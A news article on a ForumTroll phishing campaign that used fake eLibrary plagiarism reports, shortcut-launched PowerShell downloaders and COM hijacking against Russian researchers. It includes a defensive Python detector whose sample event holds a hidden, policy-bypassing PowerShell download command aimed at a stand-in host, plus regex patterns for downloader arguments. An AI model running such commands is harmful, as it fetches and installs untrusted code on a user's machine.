Phishing campaign targets Russian researchers using Chrome exploit tactics
Farah Amod
December 30, 2026
The operation shows continued focus on credential theft and malware delivery through tailored academic lures.
What happened
According to Cyber Security News, researchers have reported that the threat group known as ForumTroll (tracked as Operation ForumTroll) launched a new phishing campaign targeting Russian political scientists and academic researchers. The campaign follows earlier activity linked to the exploitation of a Chrome zero-day vulnerability tracked as CVE-2025-2783. Researchers said the latest operation relied on phishing emails impersonating the eLibrary scientific library and directed victims to download fake plagiarism reports hosted on attacker-controlled infrastructure.
Going deeper
Unlike earlier campaigns that focused on organizations, this wave targeted individual scholars at universities and research institutes. Emails were sent from addresses designed to resemble legitimate academic support contacts and linked to cloned versions of the eLibrary website. Each victim received a customized archive named with their full name, which increased credibility and reduced suspicion. The attackers registered the malicious domain months before launching the campaign, allowing it to age and blend into normal traffic. The website restricted repeated downloads and adjusted behavior when accessed from non-Windows systems, which complicated analysis and reduced accidental exposure.
What was said
Researchers said the downloaded archives contained shortcut files that executed PowerShell scripts when opened. These scripts retrieved additional payloads from the attacker’s server and installed them in locations that mimicked legitimate Windows components. Persistence was achieved through registry-based COM hijacking, a technique previously observed in earlier ForumTroll activity. Once established, the malware deployed a commercial remote access framework while displaying a decoy plagiarism report to maintain the illusion of legitimacy.
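As an added example (not from the report or the researchers), here is a small Python triage filter over constructed Sysmon-style events that flags the two behaviours described above: PowerShell launched from Explorer with download or hidden-window arguments, as an opened shortcut file would produce, and a per-user CLSID server registration whose binary sits in a user-writable directory, the footprint of HKCU COM hijacking. Field names follow Sysmon event IDs 1 and 13; the paths, GUIDs and host are constructed.

```python
import re

# Constructed Sysmon-style events (EventID 1 = process creation, EventID 13 =
# registry value set). The paths, GUIDs and host are made up for this example.
SAMPLE_EVENTS = [
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell.exe -w hidden -ep bypass -c "iwr http://example.invalid/r -OutFile $env:APPDATA\svc.dll"'},
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe Get-ChildItem C:\temp"},
    {"EventID": 13,
     "TargetObject": r"HKU\S-1-5-21-1-2-3-1001\Software\Classes\CLSID\{0A1B2C3D-0000-4000-8000-000000000001}\InprocServer32\(Default)",
     "Details": r"C:\Users\alice\AppData\Roaming\Microsoft\svc.dll"},
    {"EventID": 13,
     "TargetObject": r"HKLM\Software\Classes\CLSID\{0A1B2C3D-0000-4000-8000-000000000002}\InprocServer32\(Default)",
     "Details": r"C:\Windows\System32\shell32.dll"},
]

# PowerShell arguments typical of a downloader launched from a shortcut file.
SUSPICIOUS_PS = re.compile(
    r"-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}"
    r"|invoke-webrequest|\biwr\b|downloadstring|downloadfile|-ep\s+bypass", re.I)
# Per-user CLSID server registrations are where HKCU COM hijacking lands.
COM_SERVER_KEY = re.compile(
    r"^HK(CU|U\\S-1-5-21-[\d-]+)\\Software\\Classes\\CLSID\\\{[0-9A-Fa-f-]+\}"
    r"\\(InprocServer32|LocalServer32)", re.I)
# Server binaries living in user-writable locations rather than System32.
USER_WRITABLE = re.compile(r"^C:\\Users\\|\\AppData\\|\\ProgramData\\|\\Temp\\", re.I)

def classify(event):
    """Return a finding label for a suspicious event, or None if it looks benign."""
    if event["EventID"] == 1:
        if (event["Image"].lower().endswith("powershell.exe")
                and event["ParentImage"].lower().endswith("\\explorer.exe")
                and SUSPICIOUS_PS.search(event["CommandLine"])):
            return "lnk_powershell_download"
    elif event["EventID"] == 13:
        if (COM_SERVER_KEY.match(event["TargetObject"])
                and USER_WRITABLE.search(event["Details"])):
            return "hkcu_com_hijack_user_writable"
    return None

def triage(events):
    """Return (index, label) pairs for every event that classify() flags."""
    return [(i, label) for i, e in enumerate(events) if (label := classify(e))]

if __name__ == "__main__":
    for i, label in triage(SAMPLE_EVENTS):
        print(f"event {i}: {label}")
```

The HKCU check is the useful one for this campaign: a CLSID that Windows components load per-user and that resolves to a DLL under a profile directory is worth a manual look even when the process-creation telemetry is missing.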
The big picture
According to GBHackers, analysts assess that ForumTroll is unlikely to slow down and will likely continue targeting Russian and Belarusian organizations and individuals. The group is expected to rely on a combination of zero-day exploits and well-crafted social engineering campaigns to maintain access to sensitive environments.
GBHackers noted that ForumTroll has shown “operational continuity since at least 2022,” and has access to commercial spyware frameworks such as Dante, alongside red-team tooling like Tuoni. That mix, researchers warned, positions the group as a “persistent and evolving threat” to high-value targets across Eastern Europe.
The report also advises organizations to focus on practical defenses, including training employees to verify messages that appear to come from trusted platforms, monitoring known ForumTroll infrastructure indicators, and strengthening email authentication controls to reduce impersonation risk.
FAQs
Why are academic researchers frequent targets of phishing campaigns?
They often handle sensitive research, policy analysis, and international communications, which can be valuable for intelligence collection.
How does domain aging help attackers?
Registering domains months in advance helps them avoid spam filters and appear more legitimate when the campaign begins.
Why were attacks tailored to individual victims?
Personalized file names and context reduce suspicion and increase the likelihood that targets will open malicious files.
What role did PowerShell play in the attack?
PowerShell was used to download and execute additional payloads without relying on traditional executable files.
How can universities reduce exposure to similar threats?
They can limit script execution, monitor shortcut file abuse, educate researchers on targeted phishing, and restrict access to untrusted external links.